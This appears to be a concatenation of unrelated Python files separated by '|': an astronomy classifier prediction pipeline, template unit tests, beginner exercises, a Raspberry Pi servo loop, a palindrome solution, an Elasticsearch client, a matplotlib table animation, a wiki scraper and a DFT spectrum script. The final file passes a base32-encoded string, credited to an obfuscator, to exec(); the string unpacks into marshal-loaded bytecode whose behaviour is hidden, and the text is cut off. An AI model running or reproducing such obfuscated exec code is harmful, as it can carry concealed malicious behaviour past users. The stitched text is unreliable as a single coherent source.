df, dropped_cols = _drop_multidims(df)
if dropped_cols:
warnings.warn(
"multidimentional columns are dropped from table : {}".format(
dropped_cols))
'''
df.write(table, overwrite=True, format='fits')
return
raise Exception('Unsupported format of table')
def _load_obj(*args):
return joblib.load(os.path.join(*args))
def pred(data, feats, model, mid, robust=None):
X = data[feats].values
if robust is not None:
X = robust.transform(X)
y_t = model.predict(X)
y_p = model.predict_proba(X)
p = pd.DataFrame({
#index: data[index],
f'ProbabilityS{mid}': y_p[:, 0],
f'ProbabilityQ{mid}': y_p[:, 1],
f'ProbabilityG{mid}': y_p[:, 2],
f'Label{mid}': y_t
}, index=data['__tempid__'])
#p.index('__tempid__')
return p
def predict(datasets_files, models_path, models: dict, njobs=1,
output_path='./', keep_in_memory=False):#, index='nrow'):
models_data = defaultdict(dict)
models_iterable = tqdm.tqdm(models.items(),
desc="Load models") if keep_in_memory else models.items()
for mid, model in models_iterable:
clf_path = os.path.join(models_path, f'model_{model}.pkl')
features_path = os.path.join(models_path, f'features_{model}.pkl')
models_data[mid]['clf'] = _load_obj(
clf_path) if keep_in_memory else clf_path
models_data[mid]['feats'] = _load_obj(
features_path) if keep_in_memory else features_path
if mid[:2]=='gb':
robust_path = os.path.join(models_path, f'{model}_robust_for_gb.pkl')
models_data[mid]['robust'] = _load_obj(
robust_path) if keep_in_memory else robust_path
for ds_path in tqdm.tqdm(datasets_files, desc="Predictions"):
fname, ext = os.path.splitext(ds_path)
fname = os.path.splitext(fname)[0]#.split('/')[-1]
test_data = read_table(os.path.join(ds_path))
#need_to_predict = index in test_data.columns
#if not need_to_predict:
# continue
test_data['__tempid__'] = test_data.index.copy()
        # NOTE: this inner loop over the models could be split across threads/processes
for mid, model_data in tqdm.tqdm(models_data.items()):
            preds_dst_file = f'{fname}.preds.{mid}{ext}'
if not file_exists(preds_dst_file):
if keep_in_memory:
feats = model_data['feats']
else:
feats = _load_obj(model_data['feats'])
notna_mask = test_data[feats].notna().all(axis=1)
if not notna_mask.any():
continue
test_data_notna = test_data.loc[notna_mask]
if keep_in_memory:
clf = model_data['clf']
else:
clf = _load_obj(model_data['clf'])
res = pd.DataFrame()
if mid[:2]=='gb':
if keep_in_memory:
robust = model_data['robust']
else:
robust = _load_obj(model_data['robust'])
res = pred(test_data_notna, feats, clf, mid, robust)
else:
res = pred(test_data_notna, feats, clf, mid)
if not keep_in_memory:
del clf
res.to_pickle(preds_dst_file, compression='gzip', protocol=4)
def split_data(data=None, chunksize=100000):
for istart in range(0, len(data), chunksize):
iend = min(istart + chunksize, len(data) + 1)
result = data.iloc[istart:iend]
yield result
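# Illustrative example of split_data (hypothetical frame, not executed by this script):
#     df = pd.DataFrame({'x': range(250000)})
#     for chunk in split_data(data=df, chunksize=100000):
#         print(len(chunk))   # 100000, 100000, 50000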
def assemble_results(buf_path: str, dst_path: str, models_series, format_save: str):
start_nrow = 0
for file in sorted(glob.glob(os.path.join(buf_path, '*.features.gz_pkl'))):
# shutil.copy(file, dst_path)
fname = re.findall(r'(.*)\.features\.gz_pkl$', os.path.basename(file))[0]
preds_dst_file = os.path.join(dst_path,
f'{fname}.predictions.{models_series}.{format_save}')
preds = []
for preds_file in glob.glob(
os.path.join(buf_path, f'{fname}.p*.{models_series}*')):
#print(preds_file)
preds.append(pd.read_pickle(preds_file, compression='gzip'))
try:
data = pd.concat(preds, axis=1)
except ValueError as ve:
if str(ve) == 'No objects to concatenate':
continue
else:
raise ValueError(ve)
write_table(preds_dst_file, data)
def main():
data_path = './'
models_path = os.path.join(data_path, 'models')
models_series = {
"gb": {
"path": os.path.join(models_path, 'gb'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"tn": {
"path": os.path.join(models_path, 'tn'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"gb_big": {
"path": os.path.join(models_path, 'gb'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"tn_big": {
"path": os.path.join(models_path, 'tn'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
}
}
files2predict = []
args = parse_cli_args()
#print('OOON', args.predictOn)
if args.inputFile is None :
inputFile = './x-ray_data.gz_pkl'
else:
inputFile = args.inputFile
if args.outputDir is None :
outputDir = './'
else:
outputDir = args.outputDir
if args.predictOn is None:
files2predict = []
input_data_file = read_table(inputFile)
data_path = os.path.join(outputDir, 'data')
#print('dataaaaaaaaaaaa', data_path)
data_written_file = os.path.join(data_path, "DATA_WRITTEN_FILE.txt")
if not os.path.isfile(data_written_file):
os.makedirs(data_path, exist_ok=True)
iterator = list(split_data(data = input_data_file,
chunksize=args.chunkSize))
for i, chunk in tqdm.tqdm(enumerate(iterator), total=len(iterator),
desc='Preparing data'):
fname = 'part-{:05d}'.format(i)
chunk_dst_path = os.path.join(data_path,
f'{fname}.features.gz_pkl')
chunk.to_pickle(chunk_dst_path, compression='gzip',
protocol=4)
predictOn = data_path
else:
predictOn = args.predictOn
buf_path = os.path.join(outputDir, 'buf')
os.makedirs(buf_path, exist_ok=True)
for file in glob.glob(os.path.join(predictOn, '*.features.gz_pkl')):
shutil.copy(file, buf_path)
files2predict.append(os.path.join(buf_path, os.path.basename(file)))
if args.modelsIds is not None:
#print(models_series[args.modelsSeries])
models_path = models_series[args.modelsSeries]['path']
models = {f'{args.modelsSeries}{mid}': model for mid, model in
models_series[args.modelsSeries]['models'].items()
if int(mid) in args.modelsIds}
files2predict = sorted(files2predict)
#print(files2predict, models_path, models)
predict(files2predict, models_path, models,
keep_in_memory=args.keepModelsInMemory,
njobs=args.njobs)
assemble_results(buf_path, args.outputDir,
models_series=args.modelsSeries,
format_save=args.outputExt if args.outputExt is not None else 'gz_pkl')
# if args.cleanupBuffer:
# shutil.rmtree(buf_path)
if __name__ == '__main__':
main()
|
print('123')
print('1234g')
print('12341234')
|
import pytest
import os
import numpy as np
from .. import utils
from .. import templates
def test_data_path():
"""
Data path
"""
path = os.path.join(os.path.dirname(__file__), '../data/')
assert(os.path.exists(path))
return path
def test_templates_path():
"""
Does ``templates`` path exist?
"""
path = test_data_path()
assert(os.path.exists(os.path.join(path, 'templates')))
return os.path.join(path, 'templates')
def test_read_template_ascii():
"""
    Read a template from an ASCII file
"""
path = test_templates_path()
ascii_file = os.path.join(path, 'fsps_full/fsps_QSF_12_v3_001.dat')
templ = templates.Template(file=ascii_file)
assert(templ.name == 'fsps_QSF_12_v3_001.dat')
assert(np.allclose(templ.flux.shape, [1,5994]))
return templ
def test_read_template_fits():
"""
Read template FITS file
"""
path = test_templates_path()
fits_file = os.path.join(path,
'spline_templates_v2/spline_age0.01_av0.0.fits')
templ = templates.Template(file=fits_file)
assert(np.allclose(templ.flux.shape, [templ.NZ, 12603]))
assert(templ.name == 'spline_age0.01_av0.0.fits')
return templ
def test_gaussian_templates():
"""
Test templates.gaussian_templates
"""
wave = np.arange(5000., 6000.)
centers = np.arange(5100.,5901.,100)
width = 10
widths = centers*0+width
NW = len(wave)
NG = len(centers)
norm = np.sqrt(2*np.pi*width**2)
n0 = templates.gaussian_templates(wave, centers=centers, widths=widths,
norm=False)
assert(np.allclose(n0.shape, (NW, NG)))
assert(np.allclose(n0.max(), 1., rtol=1.e-4))
assert(np.allclose(n0.sum(), norm*NG, rtol=1.e-4))
# Normalized
n1 = templates.gaussian_templates(wave, centers=centers, widths=widths,
norm=True)
assert(np.allclose(n1.shape, (NW, NG)))
assert(np.allclose(n1.max(), 1./norm, rtol=1.e-4))
assert(np.allclose(n1.sum(), NG, rtol=1.e-4))
return True
def test_bspline_templates():
"""
templates.bspline_templates
"""
wave = np.arange(5000., 6000.)
NW = len(wave)
df=6
for df in [6, 8, 12]:
for log in [True, False]:
spl = templates.bspline_templates(wave, degree=3, df=df,
get_matrix=True, log=log,
clip=0.0001, minmax=None)
assert(np.allclose(spl.shape, (NW, df)))
assert(np.allclose(spl.sum(axis=1), 1., rtol=1.e-4))
spt = templates.bspline_templates(wave, degree=3, df=df,
get_matrix=False, log=log,
clip=0.0001, minmax=None)
assert(len(spt) == df)
keys = list(spt.keys())
for i, k in enumerate(keys):
templ = spt[k]
assert(np.allclose(templ.wave, wave))
assert(np.allclose(spl[:,i], np.squeeze(templ.flux)))
|
# Define a function that takes an argument. Call the function. Identify what code is the argument and what code is the parameter.
def sentence(st):
    # Convert the argument to a string.
convertedToString = str(st)
# Get parameter length
strLength = len(convertedToString)
    # Check whether the converted string already ends with a period.
    # If not, add a period at the end of the sentence.
if convertedToString.endswith('.'):
correctSentence = convertedToString.capitalize()
else:
correctSentence = convertedToString.capitalize() + '.'
    # Finally, print the corrected sentence.
print(correctSentence)
# Call your function from Example 1 three times with different kinds of arguments: a value, a variable, and an expression.
# Identify which kind of argument is which.
# Call sentence function with value
sentence("today weather is so cold")
# Call sentence function with variable
dressing = "You should dress properly with a coat, scarf, socks, and boots."
sentence(dressing)
# Call sentence with an expression
otherwise = "If not,"
sentence(otherwise + " you risk getting sick sooner!")
# Create a function with a local variable. Show what happens when you try to use that variable outside the function.
# Explain the results.
def onlyLocalVariable():
_local = "I exist only within these walls"
print(_local)
#print(_local
#Traceback (most recent call last):
# File "/Users/ericel123/Documents/UoPeople/python 101/discussion2.py", line 39, in <module>
# print(_local)
#NameError: name '_local' is not defined
# Create a function that takes an argument. Give the function parameter a unique name.
# Show what happens when you try to use that parameter name outside the function. Explain the results.
def uniquParameter(uopeople):
print(uopeople)
#print(uopeople)
#Traceback (most recent call last):
# File "/Users/ericel123/Documents/UoPeople/python 101/discussion2.py", line 52, in <module>
# print(uopeople)
#NameError: name 'uopeople' is not defined
# Show what happens when a variable defined outside a function has the same name as a local variable inside a function.
# Explain what happens to the value of each variable as the program runs.
_global = 4
def sameGlobalLocalVariable():
    _global = 3  # a local variable that shadows the global of the same name
    print(_global)
print(_global)             # 4 -> the global value
sameGlobalLocalVariable()  # 3 -> the local value shadows the global inside the function
print(_global)             # 4 -> the global was never modified
# Output:
# 4
# 3
# 4
def func(james):          # 'james' is the parameter
    print("Hi " + james)  # the value passed in the call below is the argument
func('James')
|
import RPi.GPIO as GPIO
import time
'''
Front Wheel control left and right.
====> 50HZ
0° ---- 0.5ms ---- 2.5%
45° ---- 1.0ms ---- 5.0%
90° ---- 1.5ms ---- 7.5%
135° ---- 2.0ms ---- 10.0%
180° ---- 2.5ms ---- 12.5%
Red ---- +5V ---- GPIO.2
Brown ---- GND ---- GPIO.6
Yellow ---- SIG ---- GPIO.12
'''
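# Hedged helper sketch derived from the mapping above (not part of the original script):
# converts a steering angle in degrees to a PWM duty cycle (%) at 50 Hz.
def angle_to_duty(angle):
    """0 deg -> 2.5 %, 90 deg -> 7.5 %, 180 deg -> 12.5 %, linear in between."""
    return 2.5 + angle / 18.0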
# Front Wheel
SIG = 12
# BOARD or BCM
GPIO.setmode(GPIO.BOARD)
GPIO.setup(SIG, GPIO.OUT)
car = GPIO.PWM(SIG, 50) # 50HZ
car.start(0)
if __name__ == '__main__':
try:
while True:
for i in range(5, 11, 1):
car.ChangeDutyCycle(i)
print(i)
time.sleep(0.5)
for i in range(10, 4, -1):
car.ChangeDutyCycle(i)
print(i)
time.sleep(0.5)
except KeyboardInterrupt:
car.ChangeDutyCycle(7.5)
time.sleep(1)
car.stop()
GPIO.cleanup()
print('Exit...')
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
test = lambda x, y: (x * x) + (y * y)
f = test(3, 2)
print(f)
|
'''
Given a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.
Notice
Have you consider that the string might be empty? This is a good question to ask during an interview.
For the purpose of this problem, we define empty string as valid palindrome.
Example
"A man, a plan, a canal: Panama" is a palindrome.
"race a car" is not a palindrome.
'''
class Solution:
"""
@param s: A string
@return: Whether the string is a valid palindrome
"""
    def isPalindrome(self, s):
        length = len(s)
        if length < 2:
            return True
        start = 0
        end = length - 1
        while start < end:
            strStart = s[start].lower()
            strEnd = s[end].lower()
            if not self.isAlphanumeric(strStart):
                start += 1
                continue
            if not self.isAlphanumeric(strEnd):
                end -= 1
                continue
            if strStart == strEnd:
                start += 1
                end -= 1
            else:
                return False
        # The two pointers met or crossed without finding a mismatch.
        return True
    def isAlphanumeric(self, data):
        # Only lowercase letters and digits count; callers lowercase the input first.
        return ('a' <= data <= 'z') or ('0' <= data <= '9')
data = "A man, a plan, a canal: Panama "
data='aa'
print("data is ", data)
mySol = Solution()
res = mySol.isPalindrome(data)
print("res is ",res)
|
#!/usr/bin/python3
''' Module with lookup function'''
def lookup(obj):
"""
    Return a list of the attributes and methods of an object.
"""
return list(dir(obj))
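# Illustrative usage (not part of the original module): lookup() simply wraps dir(),
# so it lists the attributes and methods available on any object, e.g.
#     >>> 'append' in lookup([])
#     True
#     >>> 'upper' in lookup('hello')
#     True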
|
"""function to buggy"""
"""calculation "x-1/x"""
def buggyfunc(x):
y = x
for i in range(x):
y = y-1
z = x/y
return z
buggyfunc(20)
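# Hedged sketch of a fixed variant (not part of the original exercise): stopping the
# loop one step earlier keeps y >= 1, so the division never hits zero.
def fixedfunc(x):
    y = x
    z = None
    for i in range(x - 1):  # y counts down to 1 instead of 0
        y = y - 1
        z = x / y
    return z
fixedfunc(20)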
|
#
# (C) 2013 Varun Mittal <varunmittal91@gmail.com>
# JARVIS program is distributed under the terms of the GNU General Public License v3
#
# This file is part of JARVIS.
#
# JARVIS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 3 of the License.
#
# JARVIS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with JARVIS. If not, see <http://www.gnu.org/licenses/>.
#
from django.conf import settings
import elasticsearch
from elasticsearch import Elasticsearch, RequestsHttpConnection
is_appengine_env = True
try:
from jarvis_frontend.utilities import isDevelopmentServer
except:
is_appengine_env = False
class ElasticSearchClient:
def __init__(self):
SERVERS = getattr(settings, 'ES_HOSTS', [])
if is_appengine_env:
if isDevelopmentServer():
__servers = []
for server in SERVERS:
if 'production' in server and server['production']:
continue
__servers.append(server)
SERVERS = __servers
for server in SERVERS:
            if server.get('use_ssl'):
url = "https://%s:%s/" % (server['host'], server['port'])
else:
url = "http://%s:%s/" % (server['host'], server['port'])
server['url'] = url
self.SERVERS = SERVERS
self.es = Elasticsearch(SERVERS)
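# Illustrative usage sketch (the host settings below are hypothetical):
#     # settings.ES_HOSTS = [{'host': 'localhost', 'port': 9200, 'use_ssl': False}]
#     client = ElasticSearchClient()
#     client.es.ping()   # True if the cluster is reachable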
|
import matplotlib.animation as animation
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
fig,ax = plt.subplots()
fig.patch.set_visible(False)
ax.axis("off")
def animate(i):
# fig,ax = plt.subplots()
fig.patch.set_visible(False)
ax.axis("off")
#================Calls table==========================
df = pd.read_csv("Call_Max_OI.csv")
df1= pd.read_csv("Call_Max_negchnginOI.csv")
df2= pd.read_csv("Call_Max_poschnginOI.csv")
df3= pd.read_csv("Call_Max_volume.csv")
df.update(df.select_dtypes(include=np.number).applymap('{:,}'.format))
df1.update(df1.select_dtypes(include=np.number).applymap('{:,}'.format))
df2.update(df2.select_dtypes(include=np.number).applymap('{:,}'.format))
df3.update(df3.select_dtypes(include=np.number).applymap('{:,}'.format))
# df['OI'] = df['OI'].map('{:,.2f}'.format)
fig.tight_layout()
colors = plt.cm.PuBuGn(np.linspace(0.1, 0.9, len(df)))
ax.text(0.00690061, 0.860942, "Calls:-",size=35)
ax.text(0.00690061, 0.386018, "Puts:-",size=35)
tab1 = ax.table(cellText=df.values, colLabels=df.columns,
cellLoc='center',colColours=colors,bbox=[0.00690061, 0.568072, 0.2, 0.2])
tab2 = ax.table(cellText=df1.values, colLabels=df1.columns,
cellLoc='center',colColours=colors,bbox=[0.248842, 0.568072, 0.2, 0.2])
tab3 = ax.table(cellText=df2.values, colLabels=df2.columns,
cellLoc='center',colColours=colors,bbox=[0.493855, 0.568072, 0.2, 0.2])
# tab2.scale(3,1.5)
tab4 = ax.table(cellText=df3.values, colLabels=df3.columns,
cellLoc='center',colColours=colors,bbox=[0.742709, 0.568072, 0.2, 0.2])
tab1.auto_set_font_size(False)
tab1.set_fontsize(11)
tab2.auto_set_font_size(False)
tab2.set_fontsize(11)
tab3.auto_set_font_size(False)
tab3.set_fontsize(11)
tab4.auto_set_font_size(False)
tab4.set_fontsize(11)
#===================Puts table============================
f = pd.read_csv("Put_Max_OI.csv")
f1= pd.read_csv("Put_Max_negchnginOI.csv")
f2= pd.read_csv("Put_Max_poschnginOI.csv")
f3 = pd.read_csv("Put_Max_Vol.csv")
f.update(f.select_dtypes(include=np.number).applymap('{:,}'.format))
f1.update(f1.select_dtypes(include=np.number).applymap('{:,}'.format))
f2.update(f2.select_dtypes(include=np.number).applymap('{:,}'.format))
f3.update(f3.select_dtypes(include=np.number).applymap('{:,}'.format))
tab5 = ax.table(cellText=f.values, colLabels=f.columns,
cellLoc='center',colColours=colors,bbox=[0.00690061, 0.0714286, 0.2, 0.2])
tab6 = ax.table(cellText=f1.values, colLabels=f1.columns,
cellLoc='center',colColours=colors,bbox=[0.248842, 0.0714286, 0.2, 0.2])
# tab2.scale(3,1.5)
tab7 = ax.table(cellText=f2.values, colLabels=f2.columns,
cellLoc='center',colColours=colors,bbox=[0.493855, 0.0714286, 0.2, 0.2])
tab8 = ax.table(cellText=f3.values, colLabels=f3.columns,
cellLoc='center',colColours=colors,bbox=[0.742709, 0.0714286, 0.2, 0.2])
tab5.auto_set_font_size(False)
tab5.set_fontsize(11)
tab6.auto_set_font_size(False)
tab6.set_fontsize(11)
tab7.auto_set_font_size(False)
tab7.set_fontsize(11)
tab8.auto_set_font_size(False)
tab8.set_fontsize(11)
# ax.annotate(f"Calls:-",
# xy=(0.00690061, 0.939683), xytext=(0, 10))
# xycoords=('axes fraction', 'figure fraction'),
# textcoords='offset points',
# size=20, ha='center', va='bottom',color = 'g')
# plt.subplots_adjust(left=0.2, bottom=0.2)
# tab2.auto_set_column_width(col=list(range(len(df.columns))))
# props=tab2.properties()
# print(props)
ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.show()
|
#! /usr/bin/python3
import codecs
import html.parser
import re
import sqlite3
import urllib.request
class SifParser(html.parser.HTMLParser):
def __init__(self):
super().__init__()
self._tag = [None]
self._table = None
self._record = None
self._records = None
self._data = None
self._rowspan = None
# database
self._db = sqlite3.connect('sif.db')
c = self._db.cursor()
c.execute('DROP TABLE IF EXISTS member')
c.execute(
'CREATE TABLE member('
'_no INTEGER NOT NULL PRIMARY KEY, '
'img VARCHAR(255), '
'name VARCHAR(255) NOT NULL, '
'type VARCHAR(7) NOT NULL, '
'stamina INTEGER, '
'smile INTEGER, '
'pure INTEGER, '
'cool INTEGER, '
'max_stamina INTEGER, '
'max_smile INTEGER, '
'max_pure INTEGER, '
'max_cool INTEGER, '
'final_max_stamina INTEGER, '
'final_max_smile INTEGER, '
'final_max_pure INTEGER, '
'final_max_cool INTEGER, '
'skill VARCHAR(255), '
'center_skill VARCHAR(255), '
'rarity INTEGER NOT NULL'
')')
self._db.commit()
c.close()
def appendData(self, data):
if (len(self._data) == 0):
self._data = data
elif (len(data) > 0):
self._data = '%s,%s' % (self._data, data)
def appendRowspan(self):
while len(self._record) in self._rowspan.keys():
rowspan = self._rowspan[len(self._record)]
self._record.append(rowspan[1])
rowspan[0] -= 1
if (rowspan[0] == 0):
rowspan = None
self._rowspan.pop(len(self._record) - 1)
def insertRecord(self):
query = None
if (self._table == 'N'):
query = (
'INSERT INTO member (_no, img, name, type, stamina, smile, pure, cool, final_max_stamina, final_max_smile, final_max_pure, final_max_cool, rarity) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')
else:
query = (
'INSERT INTO member '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')
c = self._db.cursor()
for record in self._records:
c.execute(query, record)
self._db.commit()
c.close()
def handle_starttable(self):
self._rowspan = {}
self._records = []
def handle_endtable(self):
self.insertRecord()
self._table = None
self._rowspan = None
self._records = None
def handle_starttr(self):
self._record = []
def handle_endtr(self):
# check trailing rowspan
self.appendRowspan()
# the first column should be number
if (self._record[0] != None) and (self._record[0].isdigit()):
self._record.append({
'N' : 1,
'R' : 3,
'SR' : 5,
'UR' : 7
}.get(self._table, None))
self._records.append(tuple(self._record))
self._record = None
def handle_starttd(self, attrs):
self._data = ''
colspan = None
# append data for rowspan
self.appendRowspan()
# check colspan and rowspan
for attr in attrs:
if (attr[0] == 'colspan'):
colspan = int(attr[1])
elif (attr[0] == 'rowspan'):
self._rowspan[len(self._record)] = [int(attr[1]) - 1, None]
if (colspan != None):
for i in range(1, colspan):
self._record.append(None)
def handle_endtd(self):
# record for rowspan
if len(self._record) in self._rowspan.keys():
rowspan = self._rowspan[len(self._record)]
if (rowspan[1] == None):
rowspan[1] = self._data
if (len(self._data) == 0):
self._data = None
self._record.append(self._data)
self._data = None
def handle_starttag(self, tag, attrs):
self._tag.append(tag)
if (self._table != None):
if (tag == 'table'):
self.handle_starttable()
if (tag == 'tr'):
self.handle_starttr()
elif (tag == 'td'):
self.handle_starttd(attrs)
def handle_endtag(self, tag):
self._tag.pop()
if (self._table != None):
if (tag == 'table'):
self.handle_endtable()
elif (tag == 'tr'):
self.handle_endtr()
elif (tag == 'td'):
self.handle_endtd()
def handle_startendtag(self, tag, attrs):
if (self._record != None) and (tag == 'img'):
for attr in attrs:
if (attr[0] == 'src'):
self.appendData(attr[1])
def handle_data(self, data):
data_ = data.strip(' \r\n\t')
if (self._tag[-1] == 'h2'):
m = re.match(r'\[(\w+)\]部員', data_)
if (m != None):
self._table = m.groups()[0]
elif (self._record != None):
tags = ('td', 'a', 'strong', 'span')
if self._tag[-1] in tags:
if (data_ == '-'):
data_ = ''
self.appendData(data_)
body = None
try:
f = open('member.txt', 'r')
body = f.read()
print('page read from file')
f.close()
except:
res = urllib.request.urlopen('http://www56.atwiki.jp/bushimolovelive/pages/30.html')
body = codecs.decode(res.read())
print('page loaded, write to file')
f = open('member.txt', 'w')
f.write(body)
f.close()
parser = SifParser()
print('start to parse')
parser.feed(body)
|
import numpy as np
import matplotlib.pyplot as plt
import math
import csv
import sys
args = sys.argv
data_axis, data_value = np.loadtxt(
"./"+args[1]+".csv", delimiter=',', unpack=True)
# Length of the loaded signal
data_size=len(data_value)
# Split the signal into frames of 256 samples
r=256
# Number of extracted frames
M=int(data_size/256)
print("Mは、{}".format(M))
# M short-time Fourier transforms of length 256, stored side by side
X_r=[[0 for i in range(r)] for j in range(M)]
X_i=[[0 for i in range(r)] for j in range(M)]
for m in range(M):
for k in range(r):
for r_i in range(r):
            # The index into data_value runs over the range 0..data_size
index=m*r+r_i
X_r[m][k] += data_value[index] * math.cos(2 * math.pi * k * index / r)
X_i[m][k] += (-1) * data_value[index] * math.sin(2 * math.pi * k * index / r)
# The DFT is symmetric, so only the first 128 dimensions need to be kept
vecSize=int(r/2)
# Compute the log power spectrum
O=[[0 for i in range(vecSize)] for j in range(M)]
for m in range(M):
for k in range(vecSize):
O[m][k]=math.log(X_r[m][k] * X_r[m][k] + X_i[m][k] * X_i[m][k])
# Discard the 0th (DC) component
for m in range(M):
del O[m][0]
# Write out the log power spectrum
with open(args[1]+'_O.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(O)
# Fit a normal distribution to the log power spectra:
# compute the mean vector myu and the diagonal elements sigma of the covariance matrix, and write them out
myu=[0] * (vecSize-1)
for k in range(vecSize-1):
for m in range(M):
myu[k]+=O[m][k]
myu[k]=myu[k]/M
with open(args[1]+'_myu.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(myu)
sigma=[0] * (vecSize-1)
for k in range(vecSize-1):
for m in range(M):
sigma[k]+=(O[m][k]-myu[k])*(O[m][k]-myu[k])
sigma[k]=sigma[k]/M
with open(args[1]+'_sigma.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(sigma)
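# Hedged cross-check sketch (not part of the original script): the hand-written DFT above
# should agree with numpy's FFT on each 256-sample frame, since the phase term
# 2*pi*k*index/r differs from 2*pi*k*r_i/r only by whole turns.
#     for m in range(M):
#         frame = data_value[m * r:(m + 1) * r]
#         spectrum = np.fft.fft(frame)
#         # np.real(spectrum[k]) ~ X_r[m][k]   and   np.imag(spectrum[k]) ~ X_i[m][k]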
|
import base64
exec(base64.b32decode("EMWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWQUIZAJ5RGM5LTMNQXIZJAIJ4SAU3BPJ4HIICUNBQW423TEBKG6ICCNRQWG2ZAINXWIZLSEBBXE5LTNAFCGIDHNF2GQ5LCEAQDUIDIOR2HA4Z2F4XWO2LUNB2WELTDN5WS6U3BPJ4HIL3DN5WXUCRDEBTHE33NEBGGS3TVPAFCGIDMN5RWC3DIN5ZXIIB2EBQWC4TDNA3DICRDEBVWK6JAHIQHGYL2FVQU6NDXKI2WMRJTPJIDG5CRG4FCGIDEMF2GKIB2EBJXK3RAKNSXAIBAGYQDEMB2GMZTUMBZEAZDAMRQBIRS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2CTJNVYG64TUEBWWC4TTNBQWYCTFPBSWGIDNMFZHG2DBNQXGY33BMRZSQJ3DLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4DCY24PAYTOXDYGAYFY6BQGB4FY6BZMNKVW22DLR4GINCILR4GIM24PBTGIXDYMJSVY6DCMZOHQMBSLR4DSN2HLR4GIMK4PBSTKXDYMQYUSJS4PA4TSXDYME2FY6BYGMVVY6DBGNOHQYJSLR4GCMS4PBSWKKS4PBSGKXDYGEYC6XDYMEZVY6DCGNEV6XDYHAYEOXDYMI4VY6BQHAUFY6BQGNOHQMDDLR4GMM24PBSGEXDYMRTD4VK4PBQTOXDYHE4X2PZAIMTFY6DFHFOHQYLFLR4GCZK4PBRWEXDYME4VGVLROFOHQZJRLR4GGOK4PBRTCXDYMY3VY6BYGNOHQZBTLR4DQNK4PBSWIXDYMRSFY6BZGNOHQOLELR4DSZS4PBSGIXDYMMZFY6DDMFOHQYZSLR4GGZK4PBRTSXDYMM4VY6DFGFOHQZRRJJOHQYLGLR4GCN24PAYTOXDYMVSVY6DEHBOHQOBTLR4GEZC4PBSGKXDYMRRFY6DGGZ6HEXDYMQZFY6BYMJOHQOLGLR4GGZK4PA3WMW24LQ5VY6DEHA5VY6DEMNOHQZTELR4GKZK4PAYTOXDYGFSVY6BZMUWVY6DDHBOHQZJVLR4GIZS4PAYTMX24PA4WGLK4PBRGGXDYMYZVY6DFMRPHYXDYMY2FY6DFGFOHQZRXLR4GINT6LNMDW4C4PBTGK2DBLR4GKZC4PBSTQXDYMU3VY6DGGFOHQY3FN5OHQYTCPNOHQOBXLR4DAN2HLQTVY6BQMJOHQZJXLR4GIZTXLR4GEYS4PBSGMXDYMZRVY6DDGROHQZDCLR4DSYS4PBTDQ5C4PBRTOXDYMY4VY6DCHBOHQZBWLR4GKMK4PA4TCPZ6LR4GEZK4PBRDSNC4PAYTSTK4PAYWCXDYMZRFY6DFGVOHQZBTLR4DQYS4PBSDGXDYMQYVY6DDGROHQMJXLR4GINLILR4DSMS4PBTDOR24PA4TGXDYMNSVY6DDGY7VY6DFMFOHQYLELR4GIMJELR4DSOC4PBRGIO24PBQTGXDYHA4W2XDYMZRWQXDYHEZFY6BRGVOHQZJXLR4GMMKTOVOHQM